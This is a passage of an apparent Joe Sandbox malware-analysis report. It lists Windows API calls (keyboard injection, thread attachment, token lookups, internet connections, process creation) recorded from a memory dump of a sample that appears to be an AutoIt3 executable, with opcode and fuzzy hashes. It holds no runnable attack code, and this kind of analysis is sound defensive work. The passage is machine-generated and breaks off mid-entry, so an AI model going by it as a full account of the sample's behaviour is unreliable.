                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: c773d054c4be11b59bd802f98690b5d5eeb0beb408f01d689da2c1fe13f8cc40
                                                      • Instruction ID: a1cbcc6699cb563908073a5e4a16cd3d8a59e64a2be3f73320c656e910d5626d
                                                      • Opcode Fuzzy Hash: c773d054c4be11b59bd802f98690b5d5eeb0beb408f01d689da2c1fe13f8cc40
                                                      • Instruction Fuzzy Hash: 9B41143A600650DFCB10EF55C685A5ABBF5EF89320B098498E84A9F362CB35FD01CB91
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AE8B4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: ef53bc1aa6da2248f775791c04dbe6d999bdb510c79c88d3b54a57e0bc5925b0
                                                      • Instruction ID: 907db56b720bbd0aac7fb55d22468178df86a26091281e37376b7576238d8907
                                                      • Opcode Fuzzy Hash: ef53bc1aa6da2248f775791c04dbe6d999bdb510c79c88d3b54a57e0bc5925b0
                                                      • Instruction Fuzzy Hash: 0E31C4B46012C8BFEF209F5ACC85FAD37A5EB05350F244616FA59DB2E0CF39A9409751
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00AEAE1A
                                                      • GetWindowRect.USER32(?,?), ref: 00AEAE90
                                                      • PtInRect.USER32(?,?,00AEC304), ref: 00AEAEA0
                                                      • MessageBeep.USER32(00000000), ref: 00AEAF11
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: a9a81a6206809af15d84b198f478d5c88d55d6c819a0f2101b825c9529238790
                                                      • Instruction ID: 09ba1d13f65412812aa8f0cbee34136403a844e18659ec9af5513f932f281eee
                                                      • Opcode Fuzzy Hash: a9a81a6206809af15d84b198f478d5c88d55d6c819a0f2101b825c9529238790
                                                      • Instruction Fuzzy Hash: 20418D706001A9DFCB21CF6AC884B69BBF5FF68740F1881A9E8149F251D730B802CF92
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AC1037
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AC1053
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00AC10B9
                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00AC110B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      APIs
                                                      • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00AC1176
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AC1192
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00AC11F1
                                                      • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00AC1243
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A9644B
                                                      • __isleadbyte_l.LIBCMT ref: 00A96479
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A964A7
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A964DD
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00AE5189
                                                        • Part of subcall function 00AC387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AC3897
                                                        • Part of subcall function 00AC387D: GetCurrentThreadId.KERNEL32 ref: 00AC389E
                                                        • Part of subcall function 00AC387D: AttachThreadInput.USER32(00000000,?,00AC52A7), ref: 00AC38A5
                                                      • GetCaretPos.USER32(?), ref: 00AE519A
                                                      • ClientToScreen.USER32(00000000,?), ref: 00AE51D5
                                                      • GetForegroundWindow.USER32 ref: 00AE51DB
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • GetCursorPos.USER32(?), ref: 00AEC7C2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A9BBFB,?,?,?,?,?), ref: 00AEC7D7
                                                      • GetCursorPos.USER32(?), ref: 00AEC824
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A9BBFB,?,?,?), ref: 00AEC85E
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      APIs
                                                        • Part of subcall function 00AB8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AB8669
                                                        • Part of subcall function 00AB8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8673
                                                        • Part of subcall function 00AB8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8682
                                                        • Part of subcall function 00AB8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8689
                                                        • Part of subcall function 00AB8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB869F
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AB8BEB
                                                      • _memcmp.LIBCMT ref: 00AB8C0E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AB8C44
                                                      • HeapFree.KERNEL32(00000000), ref: 00AB8C4B
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      APIs
                                                      • __setmode.LIBCMT ref: 00A80BF2
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AC7B20,?,?,00000000), ref: 00A65B8C
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AC7B20,?,?,00000000,?,?), ref: 00A65BB0
                                                      • _fprintf.LIBCMT ref: 00A80C29
                                                      • OutputDebugStringW.KERNEL32(?), ref: 00AB6331
                                                        • Part of subcall function 00A84CDA: _flsall.LIBCMT ref: 00A84CF3
                                                      • __setmode.LIBCMT ref: 00A80C5E
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AD1A97
                                                        • Part of subcall function 00AD1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AD1B40
                                                        • Part of subcall function 00AD1B21: InternetCloseHandle.WININET(00000000), ref: 00AD1BDD
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      APIs
                                                        • Part of subcall function 00ABF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ABE1C4,?,?,?,00ABEFB7,00000000,000000EF,00000119,?,?), ref: 00ABF5BC
                                                        • Part of subcall function 00ABF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00ABF5E2
                                                        • Part of subcall function 00ABF5AD: lstrcmpiW.KERNEL32(00000000,?,00ABE1C4,?,?,?,00ABEFB7,00000000,000000EF,00000119,?,?), ref: 00ABF613
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ABEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ABE1DD
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00ABE203
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ABEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ABE237
                                                      Strings
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      APIs
                                                      • _free.LIBCMT ref: 00A95351
                                                        • Part of subcall function 00A8594C: __FF_MSGBANNER.LIBCMT ref: 00A85963
                                                        • Part of subcall function 00A8594C: __NMSG_WRITE.LIBCMT ref: 00A8596A
                                                        • Part of subcall function 00A8594C: RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000000,?,?,?,00A81013,?), ref: 00A8598F
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A64560
                                                        • Part of subcall function 00A6410D: _memset.LIBCMT ref: 00A6418D
                                                        • Part of subcall function 00A6410D: _wcscpy.LIBCMT ref: 00A641E1
                                                        • Part of subcall function 00A6410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A641F1
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00A645B5
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A645C4
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A9D6CE
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      APIs
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AC7B20,?,?,00000000), ref: 00A65B8C
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AC7B20,?,?,00000000,?,?), ref: 00A65BB0
                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00AD66AC
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD66B7
                                                      • _memmove.LIBCMT ref: 00AD66E4
                                                      • inet_ntoa.WSOCK32(?), ref: 00AD66EF
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AB9043
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AB9055
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AB906B
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AB9086
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00A612D8
                                                      • GetClientRect.USER32(?,?), ref: 00A9B84B
                                                      • GetCursorPos.USER32(?), ref: 00A9B855
                                                      • ScreenToClient.USER32(?,?), ref: 00A9B860
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AC01FD,?,00AC1250,?,00008000), ref: 00AC166F
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AC01FD,?,00AC1250,?,00008000), ref: 00AC1694
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AC01FD,?,00AC1250,?,00008000), ref: 00AC169E
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00AC01FD,?,00AC1250,?,00008000), ref: 00AC16D1
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      APIs
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00AEB59E
                                                      • ScreenToClient.USER32(?,?), ref: 00AEB5B6
                                                      • ScreenToClient.USER32(?,?), ref: 00AEB5DA
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AEB5F5
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AEB8FE
                                                      • _memset.LIBCMT ref: 00AEB90D
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B27F20,00B27F64), ref: 00AEB93C
                                                      • CloseHandle.KERNEL32 ref: 00AEB94E
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00AC6E88
                                                        • Part of subcall function 00AC794E: _memset.LIBCMT ref: 00AC7983
                                                      • _memmove.LIBCMT ref: 00AC6EAB
                                                      • _memset.LIBCMT ref: 00AC6EB8
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00AC6EC8
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      APIs
                                                        • Part of subcall function 00A612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A6134D
                                                        • Part of subcall function 00A612F3: SelectObject.GDI32(?,00000000), ref: 00A6135C
                                                        • Part of subcall function 00A612F3: BeginPath.GDI32(?), ref: 00A61373
                                                        • Part of subcall function 00A612F3: SelectObject.GDI32(?,00000000), ref: 00A6139C
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AEC030
                                                      • LineTo.GDI32(00000000,?,?), ref: 00AEC03D
                                                      • EndPath.GDI32(00000000), ref: 00AEC04D
                                                      • StrokePath.GDI32(00000000), ref: 00AEC05B
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ABA399
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ABA3AC
                                                      • GetCurrentThreadId.KERNEL32 ref: 00ABA3B3
                                                      • AttachThreadInput.USER32(00000000), ref: 00ABA3BA
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00A62231
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00A6223B
                                                      • SetBkMode.GDI32(?,00000001), ref: 00A62250
                                                      • GetStockObject.GDI32(00000005), ref: 00A62258
                                                      • GetWindowDC.USER32(?,00000000), ref: 00A9C0D3
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A9C0E0
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00A9C0F9
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00A9C112
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00A9C132
                                                      • ReleaseDC.USER32(?,00000000), ref: 00A9C13D
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00AB8C63
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AB882E), ref: 00AB8C6A
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AB882E), ref: 00AB8C77
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AB882E), ref: 00AB8C7E
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 991854a70dcb5dd327ba275ea52aa0ab7bd088098154be526695f9cc43adc42a
                                                      • Instruction ID: abe3ff2e6a84c63cadb0eb554bd8e554503014ebaa21522878806ab6c94b3a65
                                                      • Opcode Fuzzy Hash: 991854a70dcb5dd327ba275ea52aa0ab7bd088098154be526695f9cc43adc42a
                                                      • Instruction Fuzzy Hash: F6E08676642251DFD7609FF46D4CB963FACEF51792F054828B645CD041EA388542CB61
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00AA2187
                                                      • GetDC.USER32(00000000), ref: 00AA2191
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AA21B1
                                                      • ReleaseDC.USER32(?), ref: 00AA21D2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 2510d8642dd9260f90822e7d03419b35d5d2f9ea41c398d6a45ce9db62a9d399
                                                      • Instruction ID: f65495336f2bfa5ca15e34e6df11e761c13037f45409da189a189f435ebbd68a
                                                      • Opcode Fuzzy Hash: 2510d8642dd9260f90822e7d03419b35d5d2f9ea41c398d6a45ce9db62a9d399
                                                      • Instruction Fuzzy Hash: 29E01A75800254EFDB019FE4C848AADBBF5FB5C360F10C425F95A9B260DB3881429F40
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00AA219B
                                                      • GetDC.USER32(00000000), ref: 00AA21A5
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AA21B1
                                                      • ReleaseDC.USER32(?), ref: 00AA21D2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 7745d61742ba82a1819752c46032976345dc69c7b4cbb59045d8a54f9cf380e4
                                                      • Instruction ID: 5c92fe492b74e2c1570bdf909a8616426b4ad20611f817e5fdb153a2ddf8320f
                                                      • Opcode Fuzzy Hash: 7745d61742ba82a1819752c46032976345dc69c7b4cbb59045d8a54f9cf380e4
                                                      • Instruction Fuzzy Hash: F3E01A75800244EFDB019FF4C84869DBBF5FB5C360F10C025F95A9B220DB3891429F40
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00ABB981
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 3565006973-3941886329
                                                      • Opcode ID: 42fe8d67973769a3e1868016bc6251196b92f02866de040fe921678c3a70f918
                                                      • Instruction ID: 06d4627702bda8caf27ad086f6ee53eb1da88148d3897a7c9ddeaf346ea3bf83
                                                      • Opcode Fuzzy Hash: 42fe8d67973769a3e1868016bc6251196b92f02866de040fe921678c3a70f918
                                                      • Instruction Fuzzy Hash: 8F916F706106019FDB64DF68C884BA6B7F9FF49710F14856DF94ACB291DBB1E841CB60
                                                      APIs
                                                        • Part of subcall function 00A7FEC6: _wcscpy.LIBCMT ref: 00A7FEE9
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • __wcsnicmp.LIBCMT ref: 00ACB298
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00ACB361
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      • Opcode ID: b24669cbe19a48a89c9e0d8eeb139ca2bdbc654cb373b5f74c894d928071c9ac
                                                      • Instruction ID: 75bfb42a4454862d017e48d8a23cbaa13df5d67b4bfbb694b6323cafb1b49d33
                                                      • Opcode Fuzzy Hash: b24669cbe19a48a89c9e0d8eeb139ca2bdbc654cb373b5f74c894d928071c9ac
                                                      • Instruction Fuzzy Hash: 53616276A10215EFCB14DF94C986FAEB7B8AF08310F15405DF946AB351DB71AE40CB60
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00A72AC8
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A72AE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 5393192a96f76717f6c1510af6c1e8708823512a036eb27f53ef490681ab8c08
                                                      • Instruction ID: 273cb58b9e1d4fdee450c1a2363a508a0915d0de3ae9bda700da863712528e57
                                                      • Opcode Fuzzy Hash: 5393192a96f76717f6c1510af6c1e8708823512a036eb27f53ef490681ab8c08
                                                      • Instruction Fuzzy Hash: AA5144724187449BD320AF50DD86BABBBFCFF94310F82885DF2D9511A5DB308529CB26
                                                      APIs
                                                        • Part of subcall function 00A6506B: __fread_nolock.LIBCMT ref: 00A65089
                                                      • _wcscmp.LIBCMT ref: 00AC9AAE
                                                      • _wcscmp.LIBCMT ref: 00AC9AC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: 87963ae5d944a7d34034756fff7ebc66c6e2186f0a402f4e6405c10f0b609191
                                                      • Instruction ID: 7d6bd9b5e539af6ea615f8cca0d7ad5e821a141eab4b5c76e0ff2e3c35d7e956
                                                      • Opcode Fuzzy Hash: 87963ae5d944a7d34034756fff7ebc66c6e2186f0a402f4e6405c10f0b609191
                                                      • Instruction Fuzzy Hash: 2E41B572A00619BEDF209BA4DC45FEFBBB9DF49710F02007DF904AB181DA75AE0487A1
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AD2892
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00AD28C8
                                                      Strings
                                                      Memory Dump Source
